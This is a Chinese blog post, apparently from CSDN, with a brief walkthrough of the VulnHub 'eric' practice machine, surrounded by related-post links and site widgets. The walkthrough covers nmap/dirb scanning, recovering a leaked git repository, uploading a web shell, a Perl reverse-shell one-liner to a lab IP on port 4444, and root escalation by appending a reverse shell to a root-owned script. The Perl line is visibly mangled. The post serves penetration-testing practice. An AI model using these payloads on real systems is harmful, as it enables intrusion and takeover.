vulnhub-eric

最新推荐文章于 2024-01-23 20:46:44 发布
最新推荐文章于 2024-01-23 20:46:44 发布
阅读量187 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43841336/article/details/96425880
版权

扫描靶机:Nmap -sP 192.168.34.1/24

扫描开放端口:nmap -sV 192.168.34.154

扫描网站:dirb +网址

发现有上传漏洞,git泄露,admin应该是登录框
用工具将git回复

恢复了这几个

在admin.Php发现了账号和密码、
登录以后就可以上传文件了,先上传个shell(大马和 反向都可以)

反弹shell的perl码:
perl -e ‘use Socket; i = " 192.168.34.189 " ; i="192.168.34.189"; i="192.168.34.189";p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};’
得到webshell以后再home/eric下有个flag.Txt

但是还有一个flag在root下
在、home的eric下有个hackup.Sh属于root用户,root用户组,并且可以执行,

在hackup.sh的后面加个反向webshell,运行即可得到root的shell

weixin_43841336
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5397
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 2999
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7700
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7074
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub】搭建Vulnhub靶机
最新发布
qq_53058639的博客
01-23 1788
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
invisiblecities-eric
06-21
Eric Reh 看不见的城市去做斯坦博克布丁
Signal and Power Integrity - Si - Eric Bogatin.pdf
06-26
This third edition of Signal and Power Integrity—Simplified has one significant new addition over the previous edition: questions and problems at the end of each chapter to test and reinforce your ...
Js-algo-Eric
03-29
Js-algo-Eric
portafolio-eric-espinoza
04-01
portafolio-eric-espinoza
Eric6-18.08
08-09
Eric6,18.08版。Eric is a Python IDE written using PyQt and QScintilla. It provides various features such as any number of open editors, an integrated (remote) debugger, project management facilities,...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5748
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2746
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2314
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
Vulnhub:Toppo 1靶机
qq_43884092的博客
05-02 88
网站中的文件提示密码,cewl收集目标网站信息爆破ssh,拥有suid权限的python提权
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2278
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
Vulnhub之CP:eric渗透实战
weixin_43862283的博客
04-19 450
Vulnhub之CP:eric渗透实战 一、环境搭建 目标: a、/root/flag.txt b、/home/eric/flag.txt 难度:初学者 下载链接:https://isz.no/vm/eric.7z 我是用的VirtualBox进行测试的哦! 攻击机:kali linux 2019 IP地址为192.168.34.179 二、渗透实战过程 1、靶机发现、目录爆破 发...
SP eric靶机通关攻略
systemino的博客
04-30 812
大家好,今天给大家带来的靶机是SP eric,这个靶机有两个flag,我们的目标就是把它们都找出来,flag的位置已经提供,如下: ·/root/flag.txt ·/root/eric/flag.txt 靶机下载地址:https://www.vulnhub.com/entry/sp-eric,274/ 渗透方法 ·网络扫描 ·访问HTTP服务端口 ·使用dirb遍历目录 ...
利用下划线将列表中的所有元素拼接成alex wusir -eric, 使用join方法
06-08
好的,您可以使用以下代码利用下划线将列表中的所有元素拼接成`alex_wusir-eric`: ```python my_list = ['alex', 'wusir', 'eric'] result = '_'.join(my_list) result = result.replace('_', ' ', 1).replace('_'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值